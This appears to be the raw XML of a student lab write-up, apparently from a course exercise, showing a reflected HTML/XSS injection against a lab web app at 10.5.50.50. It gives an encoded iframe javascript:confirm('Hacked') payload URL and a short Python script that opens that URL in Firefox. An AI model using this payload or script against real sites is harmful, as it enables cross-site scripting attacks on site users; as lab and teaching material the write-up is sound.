    <w:p w14:paraId="7EA4F8DD" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B" w:rsidP="001B017B">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="317BF2C1" w14:textId="6E68471D" w:rsidR="001B017B" w:rsidRPr="001B017B" w:rsidRDefault="001B017B" w:rsidP="001B017B">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Note: The query is displayed by the web app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D103D1C" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B" w:rsidP="001B017B">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D16E013" w14:textId="42619CF3" w:rsidR="001B017B" w:rsidRPr="00603428" w:rsidRDefault="001B017B" w:rsidP="001B017B">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BCF6B2A" w14:textId="5DB38E05" w:rsidR="00B02A48" w:rsidRDefault="001B017B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C5C35CD" wp14:editId="7D072C51">
            <wp:extent cx="8229600" cy="3831590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="89493224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32248" name="Picture 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229600" cy="3831590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B55A9DF" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B"/>
    <w:p w14:paraId="1F49B95A" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B"/>
    <w:p w14:paraId="5C9875DF" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B"/>
    <w:p w14:paraId="663D2CF6" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B"/>
    <w:p w14:paraId="222D9A48" w14:textId="044C7894" w:rsidR="001B017B" w:rsidRDefault="001B017B">
      <w:r w:rsidRPr="00145656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step</w:t>
      </w:r>
      <w:r w:rsidR="003B4C98" w:rsidRPr="00145656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003B4C98">
        <w:t>The name ‘</w:t>
      </w:r>
      <w:r w:rsidR="003B4C98" w:rsidRPr="003B4C98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>test’</w:t>
      </w:r>
      <w:r w:rsidR="003B4C98">
        <w:t xml:space="preserve"> is used by the app as highlighted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C88D12D" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B"/>
    <w:p w14:paraId="74FC5744" w14:textId="734832C0" w:rsidR="001B017B" w:rsidRDefault="001B017B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33CFF62C" wp14:editId="20F1F315">
            <wp:extent cx="8229600" cy="3848735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7386087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0871" name="Picture 4"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229600" cy="3848735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D79F87A" w14:textId="77777777" w:rsidR="003B4C98" w:rsidRDefault="003B4C98"/>
    <w:p w14:paraId="223DAF89" w14:textId="77777777" w:rsidR="003B4C98" w:rsidRDefault="003B4C98"/>
    <w:p w14:paraId="66186FB1" w14:textId="77777777" w:rsidR="003B4C98" w:rsidRDefault="003B4C98"/>
    <w:p w14:paraId="55017AE7" w14:textId="77777777" w:rsidR="003B4C98" w:rsidRDefault="003B4C98"/>
    <w:p w14:paraId="22F3949A" w14:textId="77777777" w:rsidR="003B4C98" w:rsidRDefault="003B4C98"/>
    <w:p w14:paraId="6E34D7AA" w14:textId="554E4F18" w:rsidR="003B4C98" w:rsidRDefault="003B4C98">
      <w:r w:rsidRPr="00145656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 4</w:t>
      </w:r>
      <w:r>
        <w:t>: Header tag used for ‘test’ (</w:t>
      </w:r>
      <w:r w:rsidRPr="003B4C98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;h1&gt;test&lt;/th1&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C60D5ED" w14:textId="77777777" w:rsidR="003B4C98" w:rsidRDefault="003B4C98"/>
    <w:p w14:paraId="565AD714" w14:textId="529B6544" w:rsidR="003B4C98" w:rsidRPr="003B4C98" w:rsidRDefault="003B4C98">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Note: The text ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00E5197B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>test’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is displayed differently by the web app</w:t>
      </w:r>
      <w:r w:rsidR="00D8472F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> confirming the successful injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE0F519" w14:textId="0CC6E7C6" w:rsidR="003B4C98" w:rsidRDefault="003B4C98">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B656C5" wp14:editId="7AA822A7">
            <wp:extent cx="8229600" cy="3818890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15684235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2358" name="Picture 6"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229600" cy="3818890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EE08F1" w14:textId="77777777" w:rsidR="00613B38" w:rsidRDefault="00613B38"/>
    <w:p w14:paraId="5F76B4E5" w14:textId="77777777" w:rsidR="00613B38" w:rsidRDefault="00613B38"/>
    <w:p w14:paraId="60E31DF8" w14:textId="77777777" w:rsidR="00613B38" w:rsidRDefault="00613B38"/>
    <w:p w14:paraId="4EAA4EE7" w14:textId="77777777" w:rsidR="00613B38" w:rsidRDefault="00613B38"/>
    <w:p w14:paraId="64E468A9" w14:textId="17B3A537" w:rsidR="00613B38" w:rsidRDefault="00613B38">
      <w:r w:rsidRPr="00145656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00145656" w:rsidRPr="00145656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>: The payload used to alter the contents of the application is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203EECC4" w14:textId="417FF4F0" w:rsidR="00613B38" w:rsidRDefault="00613B38">
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00613B38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://10.5.50.50/?name=%3Cinput%20value%3d%3C%3E%3Ciframe%2fsrc%3djavascript%3aconfirm(%2</w:t>
      </w:r>
      <w:r w:rsidRPr="00613B38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2Hacked</w:t>
      </w:r>
      <w:r w:rsidRPr="00613B38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>22)</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C1183A" w14:textId="62382B57" w:rsidR="00613B38" w:rsidRDefault="00613B38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FE383A5" wp14:editId="3CEDD344">
            <wp:extent cx="8229600" cy="3813810"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="170783494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34945" name="Picture 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229600" cy="3813810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B2C44B" w14:textId="77777777" w:rsidR="00613B38" w:rsidRDefault="00613B38"/>
    <w:p w14:paraId="172FFB60" w14:textId="77777777" w:rsidR="00613B38" w:rsidRDefault="00613B38"/>
    <w:p w14:paraId="61CE213C" w14:textId="77777777" w:rsidR="00613B38" w:rsidRDefault="00613B38"/>
    <w:p w14:paraId="47F6E59A" w14:textId="77777777" w:rsidR="00613B38" w:rsidRDefault="00613B38"/>
    <w:p w14:paraId="70B82686" w14:textId="77777777" w:rsidR="00613B38" w:rsidRDefault="00613B38"/>
    <w:p w14:paraId="2B480706" w14:textId="67741C1E" w:rsidR="00613B38" w:rsidRDefault="00613B38">
      <w:r w:rsidRPr="00145656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00145656" w:rsidRPr="00145656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>: The python code created directs a user to the malicious URL embedded web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5884902C" w14:textId="77777777" w:rsidR="00613B38" w:rsidRDefault="00613B38"/>
    <w:p w14:paraId="242AD906" w14:textId="635DEC6D" w:rsidR="00613B38" w:rsidRDefault="00613B38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2543EFC9" wp14:editId="00CFBF62">
            <wp:extent cx="8229600" cy="3828415"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="35844589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45898" name="Picture 8"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229600" cy="3828415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6F9722" w14:textId="77777777" w:rsidR="000603E0" w:rsidRDefault="000603E0"/>
    <w:p w14:paraId="2BE4D133" w14:textId="77777777" w:rsidR="000603E0" w:rsidRDefault="000603E0"/>
    <w:p w14:paraId="508EE2CF" w14:textId="77777777" w:rsidR="000603E0" w:rsidRDefault="000603E0"/>
    <w:p w14:paraId="5BEA7AB8" w14:textId="77777777" w:rsidR="000603E0" w:rsidRDefault="000603E0"/>
    <w:p w14:paraId="4A907D21" w14:textId="77777777" w:rsidR="000603E0" w:rsidRDefault="000603E0"/>
    <w:p w14:paraId="0DC2EEBD" w14:textId="60275599" w:rsidR="000603E0" w:rsidRDefault="000603E0">
      <w:r w:rsidRPr="00145656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00145656" w:rsidRPr="00145656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>: Vulnerable snippet of the source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A1748D" w14:textId="77777777" w:rsidR="000603E0" w:rsidRDefault="000603E0"/>
    <w:p w14:paraId="77443168" w14:textId="5687B9A2" w:rsidR="000603E0" w:rsidRPr="000603E0" w:rsidRDefault="000603E0">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Note: Download the source code from </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00E82C57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>http://10.5.50.50/source.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="255F0AC6" w14:textId="7744F55A" w:rsidR="000603E0" w:rsidRDefault="000603E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B85659F" wp14:editId="0DA6E0C0">
            <wp:extent cx="8229600" cy="3862070"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1389002001"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02001" name="Picture 10" descr="A screenshot of a computer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229600" cy="3862070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AA60EC" w14:textId="77777777" w:rsidR="000603E0" w:rsidRDefault="000603E0"/>
    <w:p w14:paraId="1CBF15E7" w14:textId="77777777" w:rsidR="000603E0" w:rsidRDefault="000603E0"/>
    <w:p w14:paraId="54B1F222" w14:textId="77777777" w:rsidR="000603E0" w:rsidRDefault="000603E0"/>
    <w:p w14:paraId="095604EC" w14:textId="77777777" w:rsidR="000603E0" w:rsidRDefault="000603E0"/>
    <w:p w14:paraId="70ECEA82" w14:textId="57865141" w:rsidR="000603E0" w:rsidRDefault="000603E0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Python code used in automating exploit.</w:t>
      </w:r>
      <w:r w:rsidR="00770E6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00770E6C">
        <w:object w:dxaOrig="1501" w:dyaOrig="983" w14:anchorId="5C91E5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5pt;height:46pt" o:ole="">
            <v:imagedata r:id="rId23" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1757616308" r:id="rId24"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4372F0" w14:textId="77777777" w:rsidR="000603E0" w:rsidRDefault="000603E0"/>
    <w:p w14:paraId="4232F317" w14:textId="11BBA49B" w:rsidR="000603E0" w:rsidRPr="000603E0" w:rsidRDefault="000603E0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>______________________________________________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70453E77" w14:textId="77777777" w:rsidR="000603E0" w:rsidRDefault="000603E0"/>
    <w:p w14:paraId="31E4F985" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>webbrowser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="384535F7" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E"/>
    <w:p w14:paraId="5234059E" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t># Banner with blue text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C863C7" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t>banner = "\033[94m" + """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A899EB" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t>..######.....###....##.....##.########.....#######...######..########....###....##....##..######.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692590EE" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t>.##....##...##.##...##.....##.##..........##.....##.##....##.##.........##.##...###...##.##....##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6135DC04" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t>.##........##...##..##.....##.##..........##.....##.##.......##........##...##..####..##.##......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A467252" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t>..######..##.....##.##.....##.######......##.....##.##.......######...##.....##.##.##.##..######.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9CB112" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t>.......##.#########..##...##..##..........##.....##.##.......##.......#########.##..####.......##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3541CDFD" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t>.##....##.##.....##...##.##...##..........##.....##.##....##.##.......##.....##.##...###.##....##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38884392" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t>..######..##.....##....###....########.....#######...######..########.##.....##.##....##..######.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E94F7A7" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t>""" + "\033[0m</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>"  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> \033[94m sets text color to blue, \033[0m resets text color to default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EDA3AD" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E"/>
    <w:p w14:paraId="1EACEDCE" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t>print(banner)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2BB606" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E"/>
    <w:p w14:paraId="06F2FB3F" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># Take the base URL as user input with green color</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329D4521" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>base_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>input(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">"\033[92mEnter the URL to donate to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FUNDamentals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.X.50.50: \033[0m")  # \033[92m sets text color to green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5671C107" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E"/>
    <w:p w14:paraId="650712AA" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t># Define the static query string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B63FDE4" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>static_query_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "/?name=%3Cinput%20value%3d%3C%3E%3Ciframe%2fsrc%3djavascript%3aconfirm(%22Hacked%22)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260FF084" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E"/>
    <w:p w14:paraId="4C8AC5E1" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t># Combine the base URL and query string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D61EFC" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>base_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>static_query_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B6F5FA5" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E"/>
    <w:p w14:paraId="2AB51C54" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:r>
        <w:t># Open the URL in Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B43A82" w14:textId="010C95C4" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webbrowser.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>).open</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDB18F1" w14:textId="77777777" w:rsidR="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E"/>
    <w:p w14:paraId="09D655D0" w14:textId="0EB7E0A6" w:rsidR="005B3B2E" w:rsidRPr="005B3B2E" w:rsidRDefault="005B3B2E" w:rsidP="005B3B2E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:softHyphen/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:softHyphen/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:softHyphen/>
        <w:t>______________________________________________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB194D0" w14:textId="77777777" w:rsidR="003B4C98" w:rsidRDefault="003B4C98"/>
    <w:p w14:paraId="45F84821" w14:textId="77777777" w:rsidR="003B4C98" w:rsidRDefault="003B4C98"/>
    <w:p w14:paraId="0C96EE4B" w14:textId="5C5DD443" w:rsidR="003B4C98" w:rsidRDefault="003B4C98"/>
    <w:sectPr w:rsidR="003B4C98">
      <w:headerReference w:type="default" r:id="rId25"/>
      <w:footerReference w:type="default" r:id="rId26"/>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F56A3E" w14:textId="77777777" w:rsidR="00C926B3" w:rsidRDefault="00C926B3" w:rsidP="003C1D22">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6EAF2119" w14:textId="77777777" w:rsidR="00C926B3" w:rsidRDefault="00C926B3" w:rsidP="003C1D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648D0" w14:textId="05BAEBEF" w:rsidR="003C1D22" w:rsidRPr="003C1D22" w:rsidRDefault="00442EDA">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:lang w:val="en-CA"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-CA"/>
      </w:rPr>
      <w:t>Ashish Hedau</w:t>
    </w:r>
    <w:r w:rsidR="003C1D22">
      <w:rPr>
        <w:lang w:val="en-CA"/>
      </w:rPr>
      <w:t xml:space="preserve">, </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-CA"/>
      </w:rPr>
